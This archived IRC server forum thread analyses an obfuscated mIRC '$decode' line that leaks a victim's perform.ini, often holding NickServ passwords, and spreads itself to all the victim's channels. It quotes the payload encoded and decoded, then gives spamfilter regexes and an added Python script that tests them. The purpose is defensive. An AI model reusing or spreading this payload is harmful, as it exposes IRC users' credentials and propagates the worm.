mIRC $decode exploit

These are old archives. They are kept for historic purposes only.
Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US

mIRC $decode exploit

Post by Stealth »

The newest form of exploit for mIRC uses $decode.

This exploit is seen as lines that look like this:

Code:

LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)
Which when echoed, does this:

Code:

//echo -a $findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play <some channel> perform.ini)
This makes the person's perform.ini file visible to whoever is on the channel it is played to. Since a lot of people use perform for identifying, this makes takeovers and such extremely easy. Along with that, it messages itself to all the channels you are on, on all the servers you are connected to. All the user sees is the first file in his/her mIRC folder that Windows reports. The rest are done as "silent" commands.

Not too good with regex, but here is a try:

Code:

spamfilter {
	regex ".* //echo -a \$\(\$decode\(.*,m\),[0-9]\)";
	target channel;
	action block;
	reason "$decode exploit";
};
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

While I would agree with blocking any and all forms of $decode (if you want to send a file like that, use DCC), I think this regex would be good for blocking this specific exploit:

Code:

^LOL! //echo -a \$(\$decode(.+,m),[0-9])$
(?: are the \'s necessary here? I blame .NET for making me think they are :P )
codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States

Post by codemastr »

You need the \ for ( and ), but not for $. () are metacharacters for grouping. The $ doesn't need it because the $ only has meaning at the end of a (sub)expression.
-- codemastr
Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US

Post by Stealth »

I think having .* at the beginning is a good thing though, since it can have anything there to attract attention.

This does not block all of $decode, because of the $( in front of it. The $( tells mIRC to re-evaluate the output of $decode.

I have also noticed that the echo may have either of these switches: a (active window) or s (status window)

From what everyone is saying, this regex should match it well enough:

Code:

//echo -[as] \$\(\$decode\(.+,m\),[0-9]\)
Syzop
UnrealIRCd head coder
Posts: 2112
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop »

I've added the following sig to CVS:

Code:

spamfilter {
        regex "^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$";
        target channel;
        reason "$decode exploit";
        action block;
};
Without escaping the $'s it didn't work here btw ;p.
Gilou
Posts: 3
Joined: Wed Jun 30, 2004 8:45 am
Location: Pornichet, France

noobs net

Post by Gilou »

Hi ;)
Actually, the arrival of these bots also let us (admins) see that a lot of noobs were pasting the $decode thing, whatever it might contain, so, call it paranoia, we decided to block $decode (with a terrible wildcard), as it's quite useless, and even if it does not damage anything, it's quite annoying running after noobs who let stupid $decode things spread ...
SHUT UP!
Terantula

I agree, $decode is useless...

Post by Terantula »

... as I have never used it as a user in the years I have been chatting, so I have to agree with Gilou on this: blocking the use of $decode is not a loss, but a fix to a long-existing problem.

I put this spamfilter into my IRCd ASAP.

spamfilter {
	regex ".*\$decode.*";
	target channel;
	action block;
	reason "$decode commands are not permitted on this server.";
};

I don't know an apple from regcode, so I hope this works... :)
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

just $decode by itself is enough...

and you might want to block $encode while you're at it :P
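As an added illustration (not code from the thread, nor from UnrealIRCd or mIRC), the script below runs the spamfilter regexes proposed above against the exploit line quoted at the top of the thread plus a few constructed lines. It uses Python's re module as a stand-in for the IRCd's regex engine (an assumption: the same escaping rules for $ and parentheses). It shows why the parentheses and the $ have to be escaped, as codemastr and Syzop note, that Stealth's -[as] form catches both echo switches, and that the blanket $decode rule Terantula and aquanight settled on also hits ordinary chatter that merely mentions $decode while leaving an $encode line alone.

```python
import re

# Sample lines. EXPLOIT_LINE is the obfuscated line quoted at the top of the
# thread; the other three are constructed for this example.
EXPLOIT_LINE = (
    "LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj"
    "/SBwZXJmb3JtLmluaSk=,m),2)"
)
SAMPLES = {
    "exploit_active": EXPLOIT_LINE,
    # constructed: same shape, but echoing to the status window (-s)
    "exploit_status": "free stuff -> //echo -s $($decode(QUJDREVG,m),2)",
    # constructed: a harmless $encode, the case Jason raises later in the thread
    "encode_only": "//msg $me $encode(pass)",
    # constructed: ordinary chatter that merely mentions $decode
    "mentions_decode": "does anyone know what $decode does?",
}

# Rules as they appear in the thread, unanchored at the front so that any
# bait text may precede the //echo.
RULES = {
    # Stealth's refined rule: either echo switch, $ and parentheses escaped.
    "escaped": re.compile(r"//echo -[as] \$\(\$decode\(.+,m\),[0-9]\)"),
    # aquanight's draft: unescaped ( ) become groups, so the literal "(" after
    # the first $ is never matched (codemastr's point).
    "unescaped_parens": re.compile(r"^LOL! //echo -a \$(\$decode(.+,m),[0-9])$"),
    # The same rule with $ unescaped: $ is an end-of-line anchor there, so the
    # pattern can never match (what Syzop observed).
    "unescaped_dollar": re.compile(r"//echo -[as] $\($decode\(.+,m\),[0-9]\)"),
    # The blanket rule: any occurrence of $decode at all.
    "blanket": re.compile(r"\$decode"),
}


def evaluate(rules=RULES, samples=SAMPLES):
    """Return {rule_name: sorted names of the sample lines that rule matches}."""
    return {
        name: sorted(s for s, line in samples.items() if rx.search(line))
        for name, rx in rules.items()
    }


def would_block(line, rule="escaped"):
    """True if the named rule would block this channel line."""
    return RULES[rule].search(line) is not None


if __name__ == "__main__":
    for name, hits in evaluate().items():
        print(f"{name:17} -> {hits}")
```

Run as a script it prints, per rule, which sample lines it would block; the two unescaped variants block nothing, which is the quickest way to see why the CVS signature has every $ and parenthesis escaped.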
Guest

Post by Guest »

Why? $encode can't be used for that type of exploit. It can create them, but it never gets said on the server...
w00t
Posts: 1136
Joined: Thu Mar 25, 2004 3:31 am
Location: Nowra, Australia

Post by w00t »

Unless it's been escaped.
-ChatSpike IRC Network [http://www.chatspike.net]
-Denora Stats [http://denora.nomadirc.net]
-Omerta [http://www.barafranca.com]
Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason »

Claims Guest Post Above


But that would only be a mistake. And it isn't automatically for creating exploits, so a spamfilter GLINE etc. on it wouldn't be good (I $encode my passwords in my connect script to prevent accidentally showing them to the person behind me. I certainly wouldn't want to be glined for accidentally missing a / on my //echo $encode(pass))
Why the hell can't my signature be empty?
"Your message contains too few characters."
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Jason wrote: I certainly wouldn't want to be glined for accidentally missing a / on my //echo $encode(pass))
/echo doesn't even send to the server...

(Off-topic mIRC trick: hit tab after typing an identifier to evaluate it right then and there - only works on the command line (not in the script editor). :) )
Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason »

Oops, just trying to make an example! How's this:

//msg $me $encode(pass)
Why the hell can't my signature be empty?
"Your message contains too few characters."
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Well, /msg NickServ $encode(pass) would be a better example, but I personally use /nickserv :P .
Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason »

$decode you mean, when actually sending it, you would want to decode, not encode
Why the hell can't my signature be empty?
"Your message contains too few characters."